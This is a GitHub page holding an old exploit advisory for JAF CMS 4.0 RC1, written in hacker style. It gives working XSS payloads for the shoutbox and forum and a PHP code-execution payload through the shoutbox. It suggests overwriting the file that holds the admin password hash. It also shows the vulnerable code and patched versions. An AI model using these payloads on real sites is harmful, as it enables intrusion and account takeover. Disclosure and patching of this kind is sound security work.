forked from ProjectZeroDays/Exploits2
-
Notifications
You must be signed in to change notification settings - Fork 0
/
JAFCMS-4.0.txt
executable file
·104 lines (82 loc) · 4.38 KB
/
JAFCMS-4.0.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
##################################################################################
## ## _ _ _ _ ##
## Hacker: NanoyMaster ## /|| \ | || \ / ||\ ##
## Exploit: JAF CMS ## / || |\\| || \/ || \ ##
## Version: 4.0 RC1 ## \ || | \ || |\/| || / ##
## ## \||_| \_||_| |_||/ ##
##################################################################################
## vulnerabilities: XSS in shoutbox ##
## PHP execution ##
## XSS in forum ##
## ##
##################################################################################
## \m/___Props___\m/ ##
## z3r0phr34k ##
## System_Meltdown ##
## THK-GEO & THK-h3x ##
## All of Exploitarians ##
##################################################################################
//------------------------------------------------------------------------------//
// XSS in shoutbox //
//------------------------------------------------------------------------------//
Self explanitory... in the message body put: <script>alert('hi')</script>
Error: module/shout/jafshout.php
Line: 168 - 202
187 - 191 {
$message = preg_replace('/"/','',$_POST['message']);
$message = preg_replace("/>/",">",$_POST['message']);
$message = preg_replace("/</","<",$_POST['message']);
$message = str_replace("onmouse","",$_POST['message']);
$message = str_replace("/\/","edited",$_POST['message']);
}
change the relevent lines to look like the following, bar the first $_POST['message'].
187 - 191 {
$message = preg_replace('/"/','',$message);
$message = preg_replace("/>/",">",$message);
$message = preg_replace("/</","<",$message);
$message = str_replace("onmouse","",$message);
$message = str_replace("/\/","edited",$message);
}
etc etc.
*note*
This should be implemented on all of the variables stored to the flat-file
module/files/shout
*end note*
//------------------------------------------------------------------------------//
// PHP execution //
//------------------------------------------------------------------------------//
Yet again in the shoutbox type something like:
Windoze) <?php system(dir); ?>
Linux) <?php system(ls -la); ?>
you could see how usefull this could be ;) possably overwright admin/data_inc.php
(where the admin's password hash is) :p
Error: module/shout/jafshout.php
Line: 168 - 202
Patch: (see above code)
//------------------------------------------------------------------------------//
// XSS in forum //
//------------------------------------------------------------------------------//
Self explanitory... in the message body put: <script>alert('hi')</script>
Error: module/forum/topicwin.php
Line: 112- 123
112 - 117 {
$n_topic["name"]=$name;
$n_topic["email"]=$email;
$n_topic["title"]=$title;
$n_topic["date"]=$date;
$n_topic["ldate"]=$date;
$n_topic["lname"]=$name;
}
change the relevent lines to look like the following.
112 - 117 {
$n_topic["name"]=htmlentities($name, ENT_QUOTES);
$n_topic["email"]=htmlentities($email, ENT_QUOTES);
$n_topic["title"]=htmlentities($title, ENT_QUOTES);
$n_topic["date"]=htmlentities($date, ENT_QUOTES);
$n_topic["ldate"]=htmlentities($date, ENT_QUOTES);
$n_topic["lname"]=htmlentities($name, ENT_QUOTES);
}
etc etc.
//------------------------------------------------------------------------------//
// End //
//------------------------------------------------------------------------------//